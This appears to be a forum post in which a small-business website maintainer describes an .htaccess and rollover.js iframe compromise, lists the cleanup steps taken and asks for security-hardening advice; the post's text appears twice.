Tweet
long story short a website that was put up for a small local business was hacked, they gained access to the .htaccess file and inserted something there, they edited the rollover.js file in the assets directory and inserted an iframe line there.
What I did in response:
replaced ALL of the website with a fresh copy just to be safe.
BUT, about a day or so later it was infected again.
SO, I dug a little deeper and did this:
saved the rollover.js file and viewed it compared to a clean one, found the malware string as the first line or two. replaced the bad file with a clean one, did some research and generated a NEW htaccess file and replaced the one that was there. I also found a base_64 encoded php file named default.php (lazy asshats) and I did not think that there was any need to have a php file that was base_64 encoded (back in mac days of newsgroups) so I renamed that as defaultpossiblyinfected.php or I just removed it period. It was not in the root directory, but with the htaccess file. I also saw that there was one user listed in the htpassword or whatever it is called file and the user and pass did not match what I had changed anything to, the user matched, but the pass was different, I think that might have been an old PW, but the site has had a new PW assigned to it and I also used my ftp client to remove WRITE access to all of the web files and I think even some of the other files in the urchin5 directory are also write protected. When I generated a new htaccess file I think I was able to somewhat protect the htaccess file and some other stuff.
Is this sufficient? I hate that it happened on my watch and I have this feeling that there is more that I can do to lock the site down. It is being run from AT&T webhosting (not my choice, it is free) and oh I just realized that I will need to change the password for the ftp backup that takes place each week at the store. Anyways, it is an apache server I believe and I found a few sites that talk about the htaccess site but I think I need a good ebook on how to lock down a website like that. I only have one php script and it looks like that file was not messed with but it is used to send an e-mail for a contact form.
On top of that I followed the domain listed in the iframe trj and found it belonged to some asshats in west africa (ZA). I found a reference to a file there, so I made a DOC file with the link and then saved it as a htm file and then opened it and saved the file that was mentioned and then I opened it up to view it. It is an odd file, it is differently named then what the html file is on the link, but it looks like some sort of google_com or something that has a lot of google stuff in it.
Anyways, any words of advice from seasoned website vets or security. OR a link to an ebook or even a good ebook title would be sufficient. TIA
What I did in response:
replaced ALL of the website with a fresh copy just to be safe.
BUT, about a day or so later it was infected again.
SO, I dug a little deeper and did this:
saved the rollover.js file and viewed it compared to a clean one, found the malware string as the first line or two. replaced the bad file with a clean one, did some research and generated a NEW htaccess file and replaced the one that was there. I also found a base_64 encoded php file named default.php (lazy asshats) and I did not think that there was any need to have a php file that was base_64 encoded (back in mac days of newsgroups) so I renamed that as defaultpossiblyinfected.php or I just removed it period. It was not in the root directory, but with the htaccess file. I also saw that there was one user listed in the htpassword or whatever it is called file and the user and pass did not match what I had changed anything to, the user matched, but the pass was different, I think that might have been an old PW, but the site has had a new PW assigned to it and I also used my ftp client to remove WRITE access to all of the web files and I think even some of the other files in the urchin5 directory are also write protected. When I generated a new htaccess file I think I was able to somewhat protect the htaccess file and some other stuff.
Is this sufficient? I hate that it happened on my watch and I have this feeling that there is more that I can do to lock the site down. It is being run from AT&T webhosting (not my choice, it is free) and oh I just realized that I will need to change the password for the ftp backup that takes place each week at the store. Anyways, it is an apache server I believe and I found a few sites that talk about the htaccess site but I think I need a good ebook on how to lock down a website like that. I only have one php script and it looks like that file was not messed with but it is used to send an e-mail for a contact form.
On top of that I followed the domain listed in the iframe trj and found it belonged to some asshats in west africa (ZA). I found a reference to a file there, so I made a DOC file with the link and then saved it as a htm file and then opened it and saved the file that was mentioned and then I opened it up to view it. It is an odd file, it is differently named then what the html file is on the link, but it looks like some sort of google_com or something that has a lot of google stuff in it.
Anyways, any words of advice from seasoned website vets or security. OR a link to an ebook or even a good ebook title would be sufficient. TIA
Comment